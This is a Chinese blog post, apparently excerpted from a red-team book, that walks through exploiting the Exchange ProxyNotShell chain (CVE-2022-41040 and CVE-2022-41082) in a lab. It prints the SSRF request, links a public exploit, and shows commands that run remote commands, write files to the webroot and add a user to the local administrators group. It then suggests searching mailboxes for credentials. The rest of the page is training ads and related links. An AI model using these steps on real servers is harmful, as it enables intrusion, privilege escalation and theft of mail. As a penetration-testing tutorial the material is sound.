内网域森林之ProxyNotShell漏洞利用

最新推荐文章于 2024-11-28 03:12:25 发布
最新推荐文章于 2024-11-28 03:12:25 发布
阅读量1k 收藏 11
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/140925031
版权

点击星标,即时接收最新推文

360729f308373efce6f97ca8a77f2739.png

本文选自《内网安全攻防:红队之路》

在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。   

ProxyNotShell和之前的ProxyShell一样,也是将几个漏洞组合起来使用,分别为CVE-2022-41040和CVE-2022-41082。

ProxyNotShell利用链的第一个漏洞为CVE-2022-41040,该漏洞为Exchange Autodiscover前端中的一个无需认证的SSRF漏洞,攻击者可利用该漏洞以LocalSystem权限向后端的任意URL发送数据。下面为POC:

GET /autodiscover/autodiscover.json?@zdi/PowerShell?serializationLevel=Full;ExchClientVer=15.2.922.7;clientApplication=ManagementShell;TargetServer=;PSVersion=5.1.17763.592&Email=autodiscover/autodiscover.json%3F@zdi HTTP/1.1
Host: 192.168.3.12
Authorization: Basic ZGF2ZTpQYXNzdzByZEAwMg==
Connection: close

ProxyNotShell利用链的第二个漏洞为CVE-2022-41082,是存在于Exchange PowerShell后端的远程代码执行漏洞。在利用CVE-2022-41040绕过认证后,攻击者可利用CVE-2022-41082执行任意命令。

我们可以使用nmap脚本扫描目标服务器是否存在漏洞,如下图所示,脚本地址为https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse:

38ddd9d7272701d81bcb389c236de5a8.png

扫描ProxyNotShell

下图输出表明目标服务器可能存在ProxyNotShell漏洞。接下来,我们进行具体的利用,PoC地址为https://github.com/testanull/ProxyNotShell-PoC(因为部分代码是从其他项目直接复制的,使用的是python2的print语法,如果使用python3运行脚本,需要修改print)。利用的前提是需要一个有效的账户和密码。

pip install requests_ntlm2 requests
python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'ipconfig > c:\inetpub\wwwroot\aspnet_client\ipconfig.txt'
curl -k https://192.168.3.12/aspnet_client/ipconfig.txt

cc5bcbd17d15c4d0d4ba37bba64e1227.png

ProxyNotShell利用

从下图可以看到我们成功在目标服务执行命令。我们也可以将我们控制的用户添加到目标服务器的本地管理员组:

python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'net localgroup administrators dev\dave /add'

f5f41412298c4c6a4be04bfa8eaea1f2.png

ProxyNotShell添加管理员

在获得邮件服务器权限后,我们可以搜索所有邮件,来查找是否存在账户密码信息,或者其他高价值数据,也可以利用Exchange默认的一些组成员关系进行权限提升。

—  实验室旗下直播培训课程  —

81aa06591037adc0ac5859d51c3d23ec.png

2fe8440317d99f4f36ffe8535d1fa8df.jpeg

a56512df6db5defb5f977b1b7c9217d5.jpegc76fabfae30de51473db2cf2292c5b01.png

cea28a8276d964c8ff59eff21a2fc6c9.png

5735b6af594aa394db945fd302882bf5.jpeg

4dae689e6b82bf29ff9a894985cbee6f.jpeg

f8f1cddf3583156348d7b517c7b084ce.jpeg

82bb1b32950efadb49254fbea6d27bbb.png

和20000+位同学加入MS08067一起学习

e0fa9fc1f56507a978fd0fb0d2c13bf9.gif

【安全漏洞】ProxyShell漏洞复现详解
HBohan的博客
08-18 2256
前言 几天前,Orange在他的BlackHat演讲中又曝出了两条Microsoft Exchange攻击链,即ProxyOrcale和ProxyShell,前者主要用于Padding Orcale攻击,后者则利用路径混淆漏洞实现任意文件写入并最终执行代码。 本文假设读者已经阅读了Orange的幻灯片,并对ProxyLogon具有基本的了解。 另外,请注意,出于显而易见的原因,这里不会公开相应的exploit。相反,本文旨在分享我在复现RCE漏洞和编写exploit方面的经验。 漏洞链 SSRF 这个攻击是
微软Exchange Server 0Day漏洞,尽快修复
u012288737的博客
10-01 1998
微软Exchange Server 0Day漏洞 2022 年 9 月 30 日更新:Microsoft 正在调查两个报告的影响 Microsoft Exchange Server 2013、Exchange Server 2016 和 Exchange Server 2019 的零日漏洞。第一个漏洞被识别为CVE-2022-41040,是一个服务器端请求伪造 (SSRF) 漏洞,另一个是标识为CVE-2022-41082,当攻击者可以访问 PowerShell 时允许远程代码执行 (RCE)。
探索ProxyNotShell漏洞利用工具:CVE-2022-41040CVE-2022-41082的实战证明
gitblog_00099的博客
06-08 892
探索ProxyNotShell漏洞利用工具:CVE-2022-41040CVE-2022-41082的实战证明 去发现同类优质开源项目:https://gitcode.com/ 在网络安全领中,及时发现和应对漏洞至关重要。最近,一个名为"ProxyNotShell"的安全事件引起了广泛关注,它涉及CVE-2022-41040CVE-2022-41082两个高危漏洞,影响了...
微软补丁星期二修复6个已遭利用的0day和ProxyNotShell 0day
smellycat000的专栏
11-09 312
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士11月补丁日,微软发布了64个补丁修复自家产品,另外还发布了集成到微软产品中第三方中的5个其它漏洞,共计69个。这些漏洞中,有6个是已遭利用的0day。此外,微软还修复了两个 Exchange 0day。已遭利用的6个0day在已遭利用的6个0day中,有两个位于Exchange 中。它们是:CVE-2022-41028:微软Exchange S...
Exchange漏洞
Fiverya的博客
02-07 3084
Exchange漏洞
CVE-2022-41082:Microsoft Exchange 反序列化类型混淆 RCE 漏洞简单分析
CuiXY's Blog
10-23 1676
内嵌对象处理完成之后,接下来进一步反序列化 ServiceController 对象,但由于 ServiceController 在 types.ps1xml 中并没有定义 TargetTypeForDeserialization 信息,所以会在 Props 标签内嵌的 obj 中寻找 TargetTypeForDeserialization 属性,从而将反序列化的属性定义为 XamlReader,然后就会调用其 Parse 方法反序列化 S 标签中的数据。
完整的内网渗透-暗月培训之项目六1
08-03
1. 环境介绍3 2. 信息收集3 3. 对网站进行安全检测4 5. 跨网段渗透15
内网渗透小工具.zip
最新发布
11-29
内网渗透小工具我的C++学习过程-编写的渗透小工具0x01. NetLocalGroupGetMembers功能查询目标服务器本地管理组的成员0x02. NetLocalGroupEnum功能返回指定服务器上的所有本地组0x03。网络组获取用户功能返回指定...
内网渗透文档过程有截图
07-02
内网渗透文档过程 本资源总结了内网渗透测试的整个过程,从设置虚拟机网络环境到生成 payload 并进行渗透测试。下面是本资源中所涉及的知识点: 1. 虚拟机网络环境设置:在 VMware 中设置虚拟机网络环境,使用...
内网渗透思维导图指北
10-04
内网渗透思维导图指北
ATK&CK红日靶场二,Weblogic漏洞利用渗透攻略
xt350488的博客
11-28 1274
我测试了一下,shell上传,内存马注入,蚁剑连接,都获取不到shell,可能我太菜了。WebLogicTool,直接漏扫,存在CVE_2016_0638_ECHO,漏洞。靶场一套下来共20多G,夸克下载(新用户只要三块)官网的百度不行新用户贵。看到了DC这个名称的主机,基本可以确定10.10.10.10是控主机了。利用,提示了怎么使用,需要在后买你加两个参数,分别是IP和端口。ATK&CK红日靶场二,Weblogic漏洞利用渗透攻略。先搜第一个2017那个,但是没有结果,搜搜第二个2019的。
CVE-2022-1040 Sophos Firewall 服务架构与认证绕过漏洞分析之旅
include_voidmain的博客
07-21 2036
CVE-2022-1040 Sophos Firewall 服务架构与认证绕过漏洞分析之旅
exchange邮箱服务请求伪造自己命令执行漏洞
qq_46391084的博客
10-08 1558
微软Exchange Server 服务存在服务端请求伪造漏洞和远程命令执行漏洞。未经身份验证的攻击者可利用ExchangeServer存在的服务端请求伪造漏洞绕过相关权限验证,进而利用Exchange Server的远程代码执行漏洞,在目标系统上执行任意代码。 该漏洞影响所有Exchange Server版本,目前微软暂未发布漏洞补丁。 如受影响,可通过在IIS服务器中添加新的URL重写规则缓解,具体操作步骤如下: 1.在默认站点的自动发现子选项的URL重写属性中添加新的请求阻止规则。 2.
2022年最常被利用的十大漏洞
m0_61869253的博客
03-17 461
黑客攻击变得一年比一年高级和复杂,因此现在追踪了解安全漏洞比以往任何时候都来得重要。本文着重介绍了2022年恶意威胁分子利用的一些最危险的漏洞。​CVE-2022-30190(非正式名称为“Follina”)在2022年5月被披露,它是微软Windows支持诊断工具(MSDT)中的一个远程代码执行漏洞,允许远程攻击者在目标系统上执行任意shell命令。
linux恶意请求
janthinasnail的博客
08-11 446
【代码】linux恶意请求。
【安全漏洞】简要分析复现了最近的ProxyShell利用
HBohan的博客
08-29 973
前言 近日,有研究员公布了自己针对微软的Exchange服务的攻击链的3种利用方式。微软官方虽然出了补丁,但是出于种种原因还是有较多用户不予理会,导致现在仍然有许多有漏洞的服务暴露在公网中,本文主要在原理上简要分析复现了最近的ProxyShell利用链。 1.ProxyLogon: The most well-known pre-auth RCE chain 2.ProxyOracle: A plaintext-password recovery attacking chain 3.ProxyShell:
PowerShell远程代码执行漏洞(CVE-2022-41076)分析与复现
C20220511的博客
03-09 1048
使用dnspy调试器附加上该进程,反编译系统模块System.Management.Automation.dll,在登录Exchange PowerShell时,将调用该文件包含的System.Management.Automation.Remoting.ServerRemoteSession类中的HandleCreateRunspacePool()函数。其中“cve-user”是新建的普通用户账号,“4rfv5tgb.”是用户密码,同样也是Exchange的账号和密码,“
【已复现】Microsoft Exchange Server "OWASSRF" 漏洞安全风险通告
smellycat000的专栏
12-26 2350
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告Microsoft Exchange Server是微软公司的一套电子邮件服务组件。除传统的电子邮件的存取、储存、转发功能外,在新版本的产品中亦加入了一系列辅助功能,如语音邮件、邮件过滤筛选和OWA(基于Web的电子邮件存取)。近日,奇安信CERT监测到CrowdStrike发布针对Microsoft Exchange...
VB.NET网内免登录投票系统开发与源码分享
在企业网环境下,通过Windows身份验证,投票系统能够自动识别连接到网络的用户身份。这通常需要在系统中配置相应的控制器和网络权限,使得投票系统能够接入企业的活动目录(Active Directory),从而实现用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值